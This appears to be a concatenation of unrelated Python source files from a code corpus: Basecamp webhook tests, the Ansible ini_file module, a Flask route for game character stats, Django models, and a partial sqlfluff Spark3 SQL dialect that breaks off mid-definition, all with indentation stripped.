expected_message = "Tomasz created the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_created", expected_message)
def test_basecamp_makes_questions_answer_trashed(self) -> None:
expected_message = "Tomasz trashed the [answer](https://3.basecamp.com/3688623/buckets/2957043/question_answers/432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_trashed", expected_message)
def test_basecamp_makes_questions_answer_unarchived(self) -> None:
expected_message = "Tomasz unarchived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_unarchived", expected_message)
def test_basecamp_makes_question_archived(self) -> None:
expected_message = "Tomasz archived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_archived", expected_message)
def test_basecamp_makes_question_created(self) -> None:
expected_message = "Tomasz created the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_created", expected_message)
def test_basecamp_makes_question_trashed(self) -> None:
expected_message = "Tomasz trashed the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_trashed", expected_message)
def test_basecamp_makes_question_unarchived(self) -> None:
expected_message = "Tomasz unarchived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_unarchived", expected_message)
def test_basecamp_makes_message_archived(self) -> None:
expected_message = "Tomasz archived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_archived", expected_message)
def test_basecamp_makes_message_content_change(self) -> None:
expected_message = "Tomasz changed content of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_content_changed", expected_message)
def test_basecamp_makes_message_created(self) -> None:
expected_message = "Tomasz created the message [Message Title](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_created", expected_message)
def test_basecamp_makes_message_title_change(self) -> None:
expected_message = "Tomasz changed subject of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_title_changed", expected_message)
def test_basecamp_makes_message_trashed(self) -> None:
expected_message = "Tomasz trashed the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_trashed", expected_message)
def test_basecamp_makes_message_unarchived(self) -> None:
expected_message = "Tomasz unarchived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_unarchived", expected_message)
def test_basecamp_makes_todo_list_created(self) -> None:
expected_message = "Tomasz created the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_created", expected_message)
def test_basecamp_makes_todo_list_description_changed(self) -> None:
expected_message = "Tomasz changed description of the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_description_changed", expected_message)
def test_basecamp_makes_todo_list_modified(self) -> None:
expected_message = "Tomasz changed name of the todo list [NEW Name TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_name_changed", expected_message)
def test_basecamp_makes_todo_assignment_changed(self) -> None:
expected_message = "Tomasz changed assignment of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_assignment_changed", expected_message)
def test_basecamp_makes_todo_completed(self) -> None:
expected_message = "Tomasz completed the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_completed", expected_message)
def test_basecamp_makes_todo_uncompleted(self) -> None:
expected_message = "Tomasz uncompleted the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_uncompleted", expected_message)
def test_basecamp_makes_todo_created(self) -> None:
expected_message = "Tomasz created the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_created", expected_message)
def test_basecamp_makes_todo_due_on_changed(self) -> None:
expected_message = "Tomasz changed due_on of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_due_on_changed", expected_message)
def test_basecamp_makes_comment_created(self) -> None:
expected_message = "Tomasz created the [comment](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624#__recording_427058780) of the task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("comment_created", expected_message)
def _send_and_test_message(self, fixture_name: str, expected_message: str) -> None:
self.check_webhook(fixture_name, TOPIC, expected_message)
|
py | 1a30612dcf636e3419486806c0248885beb3a88e | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# Copyright: (c) 2015, Ales Nosek <anosek.nosek () gmail.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: ini_file
short_description: Tweak settings in INI files
extends_documentation_fragment: files
description:
- Manage (add, remove, change) individual settings in an INI-style file without having
to manage the file as a whole with, say, M(ansible.builtin.template) or M(ansible.builtin.assemble).
- Adds missing sections if they don't exist.
- Before Ansible 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.
- Since Ansible 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when
no other modifications need to be applied.
options:
path:
description:
- Path to the INI-style file; this file is created if required.
- Before Ansible 2.3 this option was only usable as I(dest).
type: path
required: true
aliases: [ dest ]
section:
description:
- Section name in INI file. This is added if C(state=present) automatically when
a single value is being set.
- If left empty or set to C(null), the I(option) will be placed before the first I(section).
- Using C(null) is also required if the config format does not support sections.
type: str
required: true
option:
description:
- If set (required for changing a I(value)), this is the name of the option.
- May be omitted if adding/removing a whole I(section).
type: str
value:
description:
- The string value to be associated with an I(option).
- May be omitted when removing an I(option).
type: str
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
state:
description:
- If set to C(absent) the option or section will be removed if present instead of created.
type: str
choices: [ absent, present ]
default: present
no_extra_spaces:
description:
- Do not insert spaces before and after '=' symbol.
type: bool
default: no
create:
description:
- If set to C(no), the module will fail if the file does not already exist.
- By default it will create the file if it is missing.
type: bool
default: yes
allow_no_value:
description:
- Allow option without value and without '=' symbol.
type: bool
default: no
notes:
- While it is possible to add an I(option) without specifying a I(value), this makes no sense.
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
author:
- Jan-Piet Mens (@jpmens)
- Ales Nosek (@noseka1)
'''
EXAMPLES = r'''
# Before Ansible 2.3, option 'dest' was used instead of 'path'
- name: Ensure "fav=lemonade is in section "[drinks]" in specified file
community.general.ini_file:
path: /etc/conf
section: drinks
option: fav
value: lemonade
mode: '0600'
backup: yes
- name: Ensure "temperature=cold is in section "[drinks]" in specified file
community.general.ini_file:
path: /etc/anotherconf
section: drinks
option: temperature
value: cold
backup: yes
'''
import os
import re
import tempfile
import traceback
from ansible.module_utils.basic import AnsibleModule
def match_opt(option, line):
option = re.escape(option)
return re.match('( |\t)*%s( |\t)*(=|$)' % option, line) \
or re.match('#( |\t)*%s( |\t)*(=|$)' % option, line) \
or re.match(';( |\t)*%s( |\t)*(=|$)' % option, line)
def match_active_opt(option, line):
option = re.escape(option)
return re.match('( |\t)*%s( |\t)*(=|$)' % option, line)
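# Comment-only illustration of the two matchers above, for option 'fav':
#
#     match_opt('fav', 'fav = lemonade')            # matches
#     match_opt('fav', '# fav = lemonade')          # matches (commented-out line)
#     match_active_opt('fav', '# fav = lemonade')   # no match -- only active lines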
def do_ini(module, filename, section=None, option=None, value=None,
state='present', backup=False, no_extra_spaces=False, create=True,
allow_no_value=False):
diff = dict(
before='',
after='',
before_header='%s (content)' % filename,
after_header='%s (content)' % filename,
)
if not os.path.exists(filename):
if not create:
module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)
destpath = os.path.dirname(filename)
if not os.path.exists(destpath) and not module.check_mode:
os.makedirs(destpath)
ini_lines = []
else:
ini_file = open(filename, 'r')
try:
ini_lines = ini_file.readlines()
finally:
ini_file.close()
if module._diff:
diff['before'] = ''.join(ini_lines)
changed = False
# ini file could be empty
if not ini_lines:
ini_lines.append('\n')
# last line of file may not contain a trailing newline
if ini_lines[-1] == "" or ini_lines[-1][-1] != '\n':
ini_lines[-1] += '\n'
changed = True
# append fake section lines to simplify the logic
# At top:
# Fake random section to do not match any other in the file
# Using commit hash as fake section name
fake_section_name = "ad01e11446efb704fcdbdb21f2c43757423d91c5"
# Insert it at the beginning
ini_lines.insert(0, '[%s]' % fake_section_name)
# At botton:
ini_lines.append('[')
# If no section is defined, fake section is used
if not section:
section = fake_section_name
within_section = not section
section_start = 0
msg = 'OK'
if no_extra_spaces:
assignment_format = '%s=%s\n'
else:
assignment_format = '%s = %s\n'
for index, line in enumerate(ini_lines):
if line.startswith('[%s]' % section):
within_section = True
section_start = index
elif line.startswith('['):
if within_section:
if state == 'present':
# insert missing option line at the end of the section
for i in range(index, 0, -1):
# search backwards for previous non-blank or non-comment line
if not re.match(r'^[ \t]*([#;].*)?$', ini_lines[i - 1]):
if not value and allow_no_value:
ini_lines.insert(i, '%s\n' % option)
else:
ini_lines.insert(i, assignment_format % (option, value))
msg = 'option added'
changed = True
break
elif state == 'absent' and not option:
# remove the entire section
del ini_lines[section_start:index]
msg = 'section removed'
changed = True
break
else:
if within_section and option:
if state == 'present':
# change the existing option line
if match_opt(option, line):
if not value and allow_no_value:
newline = '%s\n' % option
else:
newline = assignment_format % (option, value)
option_changed = ini_lines[index] != newline
changed = changed or option_changed
if option_changed:
msg = 'option changed'
ini_lines[index] = newline
if option_changed:
# remove all possible option occurrences from the rest of the section
index = index + 1
while index < len(ini_lines):
line = ini_lines[index]
if line.startswith('['):
break
if match_active_opt(option, line):
del ini_lines[index]
else:
index = index + 1
break
elif state == 'absent':
# delete the existing line
if match_active_opt(option, line):
del ini_lines[index]
changed = True
msg = 'option changed'
break
# remove the fake section line
del ini_lines[0]
del ini_lines[-1:]
if not within_section and option and state == 'present':
ini_lines.append('[%s]\n' % section)
if not value and allow_no_value:
ini_lines.append('%s\n' % option)
else:
ini_lines.append(assignment_format % (option, value))
changed = True
msg = 'section and option added'
if module._diff:
diff['after'] = ''.join(ini_lines)
backup_file = None
if changed and not module.check_mode:
if backup:
backup_file = module.backup_local(filename)
try:
tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir)
f = os.fdopen(tmpfd, 'w')
f.writelines(ini_lines)
f.close()
except IOError:
module.fail_json(msg="Unable to create temporary file %s", traceback=traceback.format_exc())
try:
module.atomic_move(tmpfile, filename)
except IOError:
            module.fail_json(msg='Unable to move temporary file %s to %s, IOError' % (tmpfile, filename),
                             traceback=traceback.format_exc())
return (changed, backup_file, diff, msg)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', required=True, aliases=['dest']),
section=dict(type='str', required=True),
option=dict(type='str'),
value=dict(type='str'),
backup=dict(type='bool', default=False),
state=dict(type='str', default='present', choices=['absent', 'present']),
no_extra_spaces=dict(type='bool', default=False),
allow_no_value=dict(type='bool', default=False),
create=dict(type='bool', default=True)
),
add_file_common_args=True,
supports_check_mode=True,
)
path = module.params['path']
section = module.params['section']
option = module.params['option']
value = module.params['value']
state = module.params['state']
backup = module.params['backup']
no_extra_spaces = module.params['no_extra_spaces']
allow_no_value = module.params['allow_no_value']
create = module.params['create']
(changed, backup_file, diff, msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create, allow_no_value)
if not module.check_mode and os.path.exists(path):
file_args = module.load_file_common_arguments(module.params)
changed = module.set_fs_attributes_if_different(file_args, changed)
results = dict(
changed=changed,
diff=diff,
msg=msg,
path=path,
)
if backup_file is not None:
results['backup_file'] = backup_file
# Mission complete
module.exit_json(**results)
if __name__ == '__main__':
main()
|
py | 1a30616824a44a70a2e71e958137e9cfc4f8c4b0 | from flask import request, jsonify
import json
from urllib import parse as urlparse
import time
import sys
import sqlite3
from dnfp import app, apputils
from inventory import Inventory
from skilltree import SkillTree
from character import Character
from libutil import LibUtil as myutil
def get_neople_ids(name, server):
server_dict={'안톤':'anton','바칼':'bakal','카인':'cain','카시야스':'casillas',
'디레지에':'diregie','힐더':'hilder','프레이':'prey','시로코':'siroco'}
s_id=server_dict[server]
cha_id_url = 'servers/'+s_id+'/characters?characterName='+urlparse.quote(name)+'&'
try:
cha_id_dic=myutil.load_api(cha_id_url)
except:
raise
cha_id=cha_id_dic['rows'][0]['characterId']
return s_id, cha_id
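# Illustrative call (the character name and returned id are placeholders, not real data):
#   get_neople_ids('<character name>', '카인') -> ('cain', '<characterId from the Neople API>')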
def create_char_json(s_id, cha_id, test_mode = False, epic_status = False):
character = Character(cha_id, s_id, test_mode, custom_data = None)
if character.status[0] != 'ok':
return character.status[1]
character.do_create_char_dict(epic_status, None)
return character.char_stat
def make_char_stat(s_id, cha_id, test_mode = False, epic_status = True):
char_stat = create_char_json(s_id, cha_id, test_mode = test_mode, epic_status = epic_status)
return char_stat
@app.route("/char", methods=("GET", "POST"))
def char_stat():
name = request.args.get("name")
server = request.args.get("server")
sid, cid = get_neople_ids(name, server)
char_stat = make_char_stat(sid, cid, test_mode = False, epic_status = False)
return jsonify(char_stat)
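# Illustrative request against this route (character name is a placeholder):
#   GET /char?name=<character>&server=카인
# responds with the character's stat dictionary serialized as JSON.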
|
py | 1a30623e7acadb9a2f7c33096cf251952d89f382 | from django.db import models
from django.contrib.auth.models import User
class SessionTable(models.Model):
sess_id = models.CharField(max_length=15)
name = models.CharField(max_length=15)
class VoteTable(models.Model):
value = models.IntegerField()
user = models.ForeignKey(User, on_delete=models.CASCADE)
sess_id = models.OneToOneField(SessionTable, on_delete=models.CASCADE)
class SessionResults(models.Model):
value = models.IntegerField()
user = models.ForeignKey(User, on_delete=models.CASCADE)
|
py | 1a306362979e503de7a689895ed1e53a36f78d0a | """The Spark SQL dialect for ANSI Compliant Spark3.
Inherits from ANSI.
Spark SQL ANSI Mode is more restrictive regarding
keywords than the Default Mode, and still shares
some syntax with hive.
Based on:
- https://spark.apache.org/docs/latest/sql-ref.html
- https://spark.apache.org/docs/latest/sql-ref-ansi-compliance.html
- https://github.com/apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4
"""
from sqlfluff.core.parser import (
AnyNumberOf,
BaseSegment,
Bracketed,
CommentSegment,
Conditional,
Dedent,
Delimited,
Indent,
NamedParser,
OneOf,
OptionallyBracketed,
Ref,
RegexLexer,
Sequence,
StringParser,
SymbolSegment,
Anything,
)
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser.segments.raw import CodeSegment, KeywordSegment
from sqlfluff.dialects.dialect_spark3_keywords import (
RESERVED_KEYWORDS,
UNRESERVED_KEYWORDS,
)
ansi_dialect = load_raw_dialect("ansi")
hive_dialect = load_raw_dialect("hive")
spark3_dialect = ansi_dialect.copy_as("spark3")
spark3_dialect.patch_lexer_matchers(
[
# Spark SQL, only -- is used for single-line comment
RegexLexer(
"inline_comment",
r"(--)[^\n]*",
CommentSegment,
segment_kwargs={"trim_start": "--"},
),
# == and <=> are valid equal operations
# <=> is a non-null equals in Spark SQL
# https://spark.apache.org/docs/latest/api/sql/index.html#_10
RegexLexer("equals", r"=|==|<=>", CodeSegment),
# identifiers are delimited with `
# within a delimited identifier, ` is used to escape special characters, including `
# Ex: select `delimited `` with escaped` from `just delimited`
# https://spark.apache.org/docs/latest/sql-ref-identifier.html#delimited-identifier
RegexLexer("back_quote", r"`([^`]|``)*`", CodeSegment),
]
)
# Set the bare functions
spark3_dialect.sets("bare_functions").clear()
spark3_dialect.sets("bare_functions").update(
[
"CURRENT_DATE",
"CURRENT_TIMESTAMP",
"CURRENT_USER",
]
)
# Set the datetime units
spark3_dialect.sets("datetime_units").clear()
spark3_dialect.sets("datetime_units").update(
[
"YEAR",
# Alternate syntax for YEAR
"YYYY",
"YY",
"QUARTER",
"MONTH",
# Alternate syntax for MONTH
"MON",
"MM",
"WEEK",
"DAY",
# Alternate syntax for DAY
"DD",
"HOUR",
"MINUTE",
"SECOND",
]
)
# Set Keywords
spark3_dialect.sets("unreserved_keywords").update(UNRESERVED_KEYWORDS)
spark3_dialect.sets("reserved_keywords").update(RESERVED_KEYWORDS)
# Set Angle Bracket Pairs
spark3_dialect.sets("angle_bracket_pairs").update(
[
("angle", "StartAngleBracketSegment", "EndAngleBracketSegment", False),
]
)
# Real Segments
spark3_dialect.replace(
ComparisonOperatorGrammar=OneOf(
Ref("EqualsSegment"),
Ref("EqualsSegment_a"),
Ref("EqualsSegment_b"),
Ref("GreaterThanSegment"),
Ref("LessThanSegment"),
Ref("GreaterThanOrEqualToSegment"),
Ref("LessThanOrEqualToSegment"),
Ref("NotEqualToSegment"),
Ref("LikeOperatorSegment"),
),
TemporaryGrammar=Sequence(
Sequence("GLOBAL", optional=True),
OneOf("TEMP", "TEMPORARY"),
),
QuotedIdentifierSegment=NamedParser(
"back_quote",
CodeSegment,
name="quoted_identifier",
type="identifier",
trim_chars=("`",),
),
)
spark3_dialect.add(
# Add Hive Segments TODO : Is there a way to retrieve this w/o redefining?
DoubleQuotedLiteralSegment=NamedParser(
"double_quote",
CodeSegment,
name="quoted_literal",
type="literal",
trim_chars=('"',),
),
JsonfileKeywordSegment=StringParser(
"JSONFILE",
KeywordSegment,
name="json_file",
type="file_format",
),
RcfileKeywordSegment=StringParser(
"RCFILE", KeywordSegment, name="rc_file", type="file_format"
),
SequencefileKeywordSegment=StringParser(
"SEQUENCEFILE", KeywordSegment, name="sequence_file", type="file_format"
),
TextfileKeywordSegment=StringParser(
"TEXTFILE", KeywordSegment, name="text_file", type="file_format"
),
StartAngleBracketSegment=StringParser(
"<", SymbolSegment, name="start_angle_bracket", type="start_angle_bracket"
),
EndAngleBracketSegment=StringParser(
">", SymbolSegment, name="end_angle_bracket", type="end_angle_bracket"
),
# Add Spark Segments
EqualsSegment_a=StringParser(
"==", SymbolSegment, name="equals", type="comparison_operator"
),
EqualsSegment_b=StringParser(
"<=>", SymbolSegment, name="equals", type="comparison_operator"
),
FileKeywordSegment=StringParser(
"FILE", KeywordSegment, name="file", type="file_type"
),
JarKeywordSegment=StringParser("JAR", KeywordSegment, name="jar", type="file_type"),
WhlKeywordSegment=StringParser("WHL", KeywordSegment, name="whl", type="file_type"),
# Add relevant Hive Grammar
BracketedPropertyListGrammar=hive_dialect.get_grammar(
"BracketedPropertyListGrammar"
),
CommentGrammar=hive_dialect.get_grammar("CommentGrammar"),
FileFormatGrammar=hive_dialect.get_grammar("FileFormatGrammar"),
LocationGrammar=hive_dialect.get_grammar("LocationGrammar"),
PropertyGrammar=hive_dialect.get_grammar("PropertyGrammar"),
SerdePropertiesGrammar=hive_dialect.get_grammar("SerdePropertiesGrammar"),
StoredAsGrammar=hive_dialect.get_grammar("StoredAsGrammar"),
StoredByGrammar=hive_dialect.get_grammar("StoredByGrammar"),
StorageFormatGrammar=hive_dialect.get_grammar("StorageFormatGrammar"),
SingleOrDoubleQuotedLiteralGrammar=hive_dialect.get_grammar(
"SingleOrDoubleQuotedLiteralGrammar"
),
TerminatedByGrammar=hive_dialect.get_grammar("TerminatedByGrammar"),
# Add Spark Grammar
BucketSpecGrammar=Sequence(
Ref("ClusterSpecGrammar"),
Ref("SortSpecGrammar", optional=True),
"INTO",
Ref("NumericLiteralSegment"),
"BUCKETS",
),
ClusterSpecGrammar=Sequence(
"CLUSTERED",
"BY",
Ref("BracketedColumnReferenceListGrammar"),
),
DatabasePropertiesGrammar=Sequence(
"DBPROPERTIES", Ref("BracketedPropertyListGrammar")
),
DataSourceFormatGrammar=OneOf(
# Spark Core Data Sources
# https://spark.apache.org/docs/latest/sql-data-sources.html
"AVRO",
"CSV",
"JSON",
"PARQUET",
"ORC",
"JDBC",
# Community Contributed Data Sources
"DELTA", # https://github.com/delta-io/delta
"XML", # https://github.com/databricks/spark-xml
),
PartitionSpecGrammar=Sequence(
OneOf("PARTITION", Sequence("PARTITIONED", "BY")),
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("EqualsSegment", optional=True),
Ref("LiteralGrammar", optional=True),
Ref("CommentGrammar", optional=True),
),
),
),
),
ResourceFileGrammar=OneOf(
Ref("JarKeywordSegment"),
Ref("WhlKeywordSegment"),
Ref("FileKeywordSegment"),
),
ResourceLocationGrammar=Sequence(
"USING",
Ref("ResourceFileGrammar"),
Ref("SingleOrDoubleQuotedLiteralGrammar"),
),
SortSpecGrammar=Sequence(
"SORTED",
"BY",
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
OneOf("ASC", "DESC", optional=True),
)
)
),
optional=True,
),
UnsetTablePropertiesGrammar=Sequence(
"UNSET",
"TBLPROPERTIES",
Ref("IfExistsGrammar", optional=True),
Bracketed(Delimited(Ref("SingleOrDoubleQuotedLiteralGrammar"))),
),
TablePropertiesGrammar=Sequence(
"TBLPROPERTIES", Ref("BracketedPropertyListGrammar")
),
)
# Hive Segments
@spark3_dialect.segment()
class RowFormatClauseSegment(hive_dialect.get_segment("RowFormatClauseSegment")): # type: ignore
"""`ROW FORMAT` clause in a CREATE HIVEFORMAT TABLE statement."""
type = "row_format_clause"
@spark3_dialect.segment()
class SkewedByClauseSegment(hive_dialect.get_segment("SkewedByClauseSegment")): # type: ignore
"""`SKEWED BY` clause in a CREATE HIVEFORMAT TABLE statement."""
type = "skewed_by_clause"
# Primitive Data Types
@spark3_dialect.segment()
class PrimitiveTypeSegment(BaseSegment):
"""Spark SQL Primitive data types.
https://spark.apache.org/docs/latest/sql-ref-datatypes.html
"""
type = "primitive_type"
match_grammar = OneOf(
"BOOLEAN",
# TODO : not currently supported; add segment - see NumericLiteralSegment
# "BYTE",
"TINYINT",
# TODO : not currently supported; add segment - see NumericLiteralSegment
# "SHORT",
"SMALLINT",
"INT",
"BIGINT",
"FLOAT",
"REAL",
"DOUBLE",
"DATE",
"TIMESTAMP",
"STRING",
Sequence(
OneOf("CHAR", "CHARACTER", "VARCHAR"),
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
"BINARY",
Sequence(
OneOf("DECIMAL", "DEC", "NUMERIC"),
Bracketed(
Ref("NumericLiteralSegment"),
Ref("CommaSegment"),
Ref("NumericLiteralSegment"),
optional=True,
),
),
"INTERVAL",
)
@spark3_dialect.segment(replace=True)
class DatatypeSegment(PrimitiveTypeSegment):
"""Spark SQL Data types.
https://spark.apache.org/docs/latest/sql-ref-datatypes.html
"""
type = "data_type"
match_grammar = OneOf(
Ref("PrimitiveTypeSegment"),
Sequence(
"ARRAY",
Bracketed(
Ref("DatatypeSegment"),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
Sequence(
"MAP",
Bracketed(
Sequence(
Ref("PrimitiveTypeSegment"),
Ref("CommaSegment"),
Ref("DatatypeSegment"),
),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
Sequence(
"STRUCT",
Bracketed(
Delimited(
Sequence(
Ref("NakedIdentifierSegment"),
Ref("ColonSegment"),
Ref("DatatypeSegment"),
Ref("CommentGrammar", optional=True),
),
),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
)
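# Illustrative type expressions the segment above is intended to cover (examples only):
#   ARRAY<INT>, MAP<STRING, BIGINT>, STRUCT<name: STRING COMMENT 'person name', age: INT>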
# Data Definition Statements
# http://spark.apache.org/docs/latest/sql-ref-syntax-ddl.html
@spark3_dialect.segment()
class AlterDatabaseStatementSegment(BaseSegment):
"""An `ALTER DATABASE/SCHEMA` statement.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-database.html
"""
type = "alter_database_statement"
match_grammar = Sequence(
"ALTER",
OneOf("DATABASE", "SCHEMA"),
Ref("DatabaseReferenceSegment"),
"SET",
Ref("DatabasePropertiesGrammar"),
)
@spark3_dialect.segment(replace=True)
class AlterTableStatementSegment(BaseSegment):
"""A `ALTER TABLE` statement to change the table schema or properties.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-table.html
"""
type = "alter_table_statement"
match_grammar = Sequence(
"ALTER",
"TABLE",
Ref("TableReferenceSegment"),
OneOf(
# ALTER TABLE - RENAME TO `table_identifier`
Sequence(
"RENAME",
"TO",
Ref("TableReferenceSegment"),
),
# ALTER TABLE - RENAME `partition_spec`
Sequence(
Ref("PartitionSpecGrammar"),
"RENAME",
"TO",
Ref("PartitionSpecGrammar"),
),
# ALTER TABLE - ADD COLUMNS
Sequence(
"ADD",
"COLUMNS",
Bracketed(
Delimited(
Ref("ColumnDefinitionSegment"),
),
),
),
# ALTER TABLE - ALTER OR CHANGE COLUMN
Sequence(
OneOf("ALTER", "CHANGE"),
"COLUMN",
Ref("ColumnReferenceSegment"),
Sequence("TYPE", Ref("DatatypeSegment"), optional=True),
Ref("CommentGrammar", optional=True),
OneOf(
"FIRST",
Sequence("AFTER", Ref("ColumnReferenceSegment")),
optional=True,
),
Sequence(OneOf("SET", "DROP"), "NOT NULL", optional=True),
),
# ALTER TABLE - ADD PARTITION
Sequence(
"ADD",
Ref("IfNotExistsGrammar", optional=True),
AnyNumberOf(Ref("PartitionSpecGrammar")),
),
# ALTER TABLE - DROP PARTITION
Sequence(
"DROP",
Ref("IfExistsGrammar", optional=True),
Ref("PartitionSpecGrammar"),
Sequence("PURGE", optional=True),
),
# ALTER TABLE - REPAIR PARTITION
Sequence("RECOVER", "PARTITIONS"),
# ALTER TABLE - SET PROPERTIES
Sequence("SET", Ref("TablePropertiesGrammar")),
# ALTER TABLE - UNSET PROPERTIES
Ref("UnsetTablePropertiesGrammar"),
# ALTER TABLE - SET SERDE
Sequence(
Ref("PartitionSpecGrammar", optional=True),
"SET",
OneOf(
Sequence(
"SERDEPROPERTIES",
Ref("BracketedPropertyListGrammar"),
),
Sequence(
"SERDE",
Ref("SingleOrDoubleQuotedLiteralGrammar"),
Ref("SerdePropertiesGrammar", optional=True),
),
),
),
# ALTER TABLE - SET FILE FORMAT
Sequence(
Ref("PartitionSpecGrammar", optional=True),
"SET",
"FILEFORMAT",
Ref("DataSourceFormatGrammar"),
),
# ALTER TABLE - CHANGE FILE LOCATION
Sequence(
Ref("PartitionSpecGrammar"),
"SET",
Ref("LocationGrammar"),
),
),
)
@spark3_dialect.segment()
class AlterViewStatementSegment(BaseSegment):
"""A `ALTER VIEW` statement to change the view schema or properties.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-view.html
"""
type = "alter_view_statement"
match_grammar = Sequence(
"ALTER",
"VIEW",
Ref("TableReferenceSegment"),
OneOf(
Sequence(
"RENAME",
"TO",
Ref("TableReferenceSegment"),
),
Sequence("SET", Ref("TablePropertiesGrammar")),
Ref("UnsetTablePropertiesGrammar"),
Sequence(
"AS",
OptionallyBracketed(Ref("SelectStatementSegment")),
),
),
)
@spark3_dialect.segment(replace=True)
class CreateDatabaseStatementSegment(BaseSegment):
"""A `CREATE DATABASE` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-database.html
"""
type = "create_database_statement"
match_grammar = Sequence(
"CREATE",
OneOf("DATABASE", "SCHEMA"),
Ref("IfNotExistsGrammar", optional=True),
Ref("DatabaseReferenceSegment"),
Ref("CommentGrammar", optional=True),
Ref("LocationGrammar", optional=True),
Sequence(
"WITH", "DBPROPERTIES", Ref("BracketedPropertyListGrammar"), optional=True
),
)
@spark3_dialect.segment(replace=True)
class CreateFunctionStatementSegment(BaseSegment):
"""A `CREATE FUNCTION` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-function.html
"""
type = "create_function_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Anything(),
)
parse_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Ref("IfNotExistsGrammar", optional=True),
Ref("FunctionNameIdentifierSegment"),
"AS",
Ref("SingleOrDoubleQuotedLiteralGrammar"),
Ref("ResourceLocationGrammar", optional=True),
)
@spark3_dialect.segment(replace=True)
class CreateTableStatementSegment(BaseSegment):
"""A `CREATE TABLE` statement using a Data Source or Like.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-datasource.html
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-like.html
"""
type = "create_table_statement"
match_grammar = Sequence(
"CREATE",
"TABLE",
Ref("IfNotExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
OneOf(
# Columns and comment syntax:
Sequence(
Bracketed(
Delimited(
Sequence(
Ref("ColumnDefinitionSegment"),
Ref("CommentGrammar", optional=True),
),
),
),
),
# Like Syntax
Sequence(
"LIKE",
Ref("TableReferenceSegment"),
),
optional=True,
),
Sequence("USING", Ref("DataSourceFormatGrammar"), optional=True),
Ref("RowFormatClauseSegment", optional=True),
Ref("StoredAsGrammar", optional=True),
Sequence("OPTIONS", Ref("BracketedPropertyListGrammar"), optional=True),
Ref("PartitionSpecGrammar", optional=True),
Ref("BucketSpecGrammar", optional=True),
AnyNumberOf(
